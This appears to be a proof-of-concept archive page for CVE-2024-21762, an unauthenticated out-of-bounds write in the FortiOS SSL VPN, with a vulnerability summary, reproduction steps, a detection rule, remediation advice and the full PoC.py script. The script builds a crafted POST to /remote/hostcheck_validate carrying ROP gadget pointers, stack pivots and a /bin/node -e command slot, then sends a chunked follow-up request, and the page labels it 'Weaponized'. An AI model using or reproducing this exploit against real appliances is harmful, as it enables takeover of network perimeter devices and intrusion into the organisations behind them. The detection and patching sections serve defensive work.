PoC Archive PoC Archive
Critical CVE-2024-21762 patched

Fortinet FortiOS SSL VPN Unauthenticated RCE (CVE-2024-21762)

by d0rb (PoC), vulnerability publicly documented by Fortinet/industry researchers · 2026-05-16

CVSS 9.6/10
Severity
Critical
CVE
CVE-2024-21762
Category
web
Affected product
Fortinet FortiOS SSL VPN (sslvpnd)
Affected versions
FortiOS 7.4.0–7.4.2, 7.2.0–7.2.6, 7.0.0–7.0.13, 6.4.0–6.4.14, 6.2.0–6.2.15
Disclosed
2026-05-16
Patch status
patched

Metadata

FieldValue
Date Added2026-05-16
Author / Researcherd0rb (PoC), vulnerability publicly documented by Fortinet/industry researchers
CVE / AdvisoryCVE-2024-21762
Categoryweb
SeverityCritical
CVSS Score9.6 (CVSSv3)
StatusWeaponized
TagsRCE, out-of-bounds-write, SSL-VPN, FortiOS, edge-appliance, unauthenticated, KEV
RelatedN/A

Affected Target

FieldValue
Software / SystemFortinet FortiOS SSL VPN (sslvpnd)
Versions AffectedFortiOS 7.4.0–7.4.2, 7.2.0–7.2.6, 7.0.0–7.0.13, 6.4.0–6.4.14, 6.2.0–6.2.15
Language / PlatformFortiOS appliance SSL VPN web interface over HTTP/HTTPS
Authentication RequiredNo
Network Access RequiredYes

Summary

CVE-2024-21762 is a critical out-of-bounds write in FortiOS sslvpnd reachable through the SSL VPN web interface. A remote unauthenticated attacker can send crafted HTTP requests to corrupt memory and potentially achieve remote code execution. Public reporting and government advisories indicate active exploitation in the wild, and the vulnerability is listed in CISA KEV.


Vulnerability Details

Root Cause

The flaw is an out-of-bounds write condition in SSL VPN request processing inside the sslvpnd daemon. Crafted request data can push memory operations outside intended bounds, enabling attacker-controlled memory corruption.

Attack Vector

An attacker with network reachability to exposed FortiOS SSL VPN endpoints sends specially crafted HTTP(S) requests to vulnerable paths (commonly PoC examples use /remote/hostcheck_validate) to trigger the out-of-bounds write and pivot to an ROP-based execution path.

Impact

Successful exploitation can lead to unauthenticated remote code execution on perimeter security appliances. This can result in device takeover, lateral movement, credential access, and persistence from a highly privileged network position.


Environment / Lab Setup

OS:          Linux/macOS/Windows attacker host with Python 3
Target:      Authorized FortiOS SSL VPN endpoint in vulnerable version range
Attacker:    Security testing workstation
Tools:       Python 3, socket-capable network access, packet capture (optional)

Setup Steps

1
2
3
cd pocs/web/2026-05-16_fortios-sslvpn-rce-cve-2024-21762

python3 -m py_compile PoC.py

Proof of Concept

Step-by-Step Reproduction

  1. Confirm authorized scope and reachable SSL VPN service.

    1
    
    nc -vz <target-ip-or-hostname> 443
    
  2. Edit target parameters in the PoC (TARGET_HOST, PORT) for your authorized lab target.

    1
    
    sed -n '1,30p' PoC.py
    
  3. Run the PoC to send crafted trigger traffic.

    1
    
    python3 PoC.py
    

Exploit Code

See PoC.py in this folder.

1
2
3
4
5
6
import socket

TARGET_HOST = "x.x.x.x"
PORT = 80

data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"

Expected Output


Screenshots / Evidence

  • screenshots/ — add authorized captures (traffic traces, target crash logs, controlled exploit validation)

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert http any any -> $HOME_NET 443 (
  msg:"Possible FortiOS CVE-2024-21762 exploitation attempt";
  flow:to_server,established;
  content:"POST"; http_method;
  content:"/remote/hostcheck_validate"; http_uri;
  sid:952421762; rev:1;
)

Remediation

ActionDetail
PatchApply Fortinet fixes from FG-IR-24-015 (upgrade to patched FortiOS trains such as 7.4.3+, 7.2.7+, 7.0.14+, 6.4.15+, 6.2.16+)
WorkaroundRestrict or disable Internet-exposed SSL VPN where possible until patched
Config HardeningLimit management/VPN exposure to trusted networks, monitor SSL VPN anomalies, and enforce strong admin hygiene

References


Notes

Auto-ingested from https://github.com/d0rb/CVE-2024-21762 on 2026-05-16.

PoC.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
"""DISCLAIMER: For authorized security research only. Use only on systems you own or are explicitly authorized to test."""

import socket
import time

TARGET_HOST = "x.x.x.x"
PORT = 80

# Function to create a socket
def make_sock(target, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, port))
    return sock

# Craft the payload
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"
pivot_1 = b"%52%f7%fd%00%00%00%00%00"  # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00"  # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;
rop = b"%de%ad%be%ef"  # Example ROP chain

# Craft the form value
form_value = b""
form_value += b"B" * 11 + b"/bin/node\0" + b"B" * 6 + b"-e\0" + b"B" * 14 + b"JS_PAYLOAD"
form_value += b"B" * 438 + pivot_2 + getcwd_ptr
form_value += b"B" * 32 + pivot_1
form_value += b"B" * 168 + b"CALL_EXECL"
form_value += b"B" * 432 + ssl_do_handshake_ptr
form_value += b"B" * 32 + rop

# Craft the HTTP body
body = (b"B" * 1808 + b"=" + form_value + b"&") * 20

# Craft the HTTP request
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET_HOST.encode("utf-8") + b"\r\n"
data += f"Content-Length: {len(body)}\r\n".encode("utf-8")
data += b"\r\n"
data += body

# Send the crafted request
ssock1 = make_sock(TARGET_HOST, PORT)
ssock1.sendall(data)
time.sleep(1)
ssock2 = make_sock(TARGET_HOST, PORT)
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET_HOST.encode("utf-8") + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0" * 4137 + b"\0"
data += b"A" * 1 + b"\r\n\r\n"
ssock2.sendall(data)